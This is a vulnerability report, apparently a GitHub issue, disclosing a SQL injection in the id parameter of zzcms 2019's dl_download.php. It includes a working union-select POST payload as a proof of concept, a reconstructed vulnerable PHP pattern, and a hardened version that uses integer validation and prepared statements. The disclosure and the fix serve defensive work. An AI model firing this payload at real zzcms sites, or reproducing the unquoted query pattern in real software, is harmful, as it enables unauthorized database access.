
zzcms 2019 dl/dl_download.php SQL injection #4

Open
@cby234

Description

Link URL: http://www.zzcms.net/about/6.htm
Edition: ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)

[image]

If the index of the ',' value in the id parameter is bigger than 0, the SQL will be:

[image]

When we check the query, there is no single quote around the id parameter, so we can inject
any query via the id parameter.

[image]

We can find that there is no security filter for the id parameter, which means we can inject an SQL query via
the id parameter if we concat a ',' value at the end of the id parameter.

0x02 Payload

Give the "POC" value below as the POST data for "/dl/dl_download.php":

POC: union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

[image]

[image]
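As an added example (not code from the issue or from zzcms), the PHP below puts the unsafe pattern the report describes next to a hardened version that validates every id as an integer and binds it through PDO placeholders. The vulnerable function is an assumed reconstruction, since the actual lines 67~71 are only shown in screenshots; the table name zzcms_dl comes from the payload, and the function names and the $pdo connection are assumptions.

```php
<?php
// Added example, not zzcms code. The vulnerable function is an ASSUMED
// reconstruction of the pattern the report describes: the id[] values are
// joined with ',' and dropped into the SQL text without quoting or checks.

// ASSUMED vulnerable pattern: once the joined value contains a ',', the raw
// string lands inside "in (...)", so "1) union select ... -- a," becomes SQL.
function build_where_vulnerable(array $ids): string
{
    $id = implode(',', $ids);              // no per-element validation
    if (strpos($id, ',') > 0) {
        return "where id in ($id)";        // attacker-controlled SQL text
    }
    return "where id = $id";               // still unquoted
}

// Hardened version: accept only digit strings, cast to int, and emit one
// placeholder per value so the id list can never change the SQL structure.
function build_where_safe($raw): array
{
    $ids = is_array($raw) ? $raw : [$raw];
    $clean = [];
    foreach ($ids as $v) {
        // ctype_digit rejects anything outside [0-9]+: ')', spaces, '--', etc.
        if (!is_string($v) || $v === '' || !ctype_digit($v)) {
            throw new InvalidArgumentException('id must be a non-negative integer');
        }
        $clean[] = (int) $v;
    }
    if ($clean === []) {
        throw new InvalidArgumentException('id is required');
    }
    $placeholders = implode(',', array_fill(0, count($clean), '?'));
    return ["where id in ($placeholders)", $clean];
}

// Usage with a prepared statement: the SQL text holds only '?' markers and
// the values travel separately as bound parameters. $pdo is an assumed,
// already-open PDO connection to the zzcms database.
function fetch_downloads(PDO $pdo, $raw): array
{
    [$where, $params] = build_where_safe($raw);
    $stmt = $pdo->prepare("select * from zzcms_dl $where");
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

Feeding the report's id[] value to build_where_safe throws instead of producing a query, which is the behaviour a patched dl_download.php should have; rejecting early also gives a clean log point for detection.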
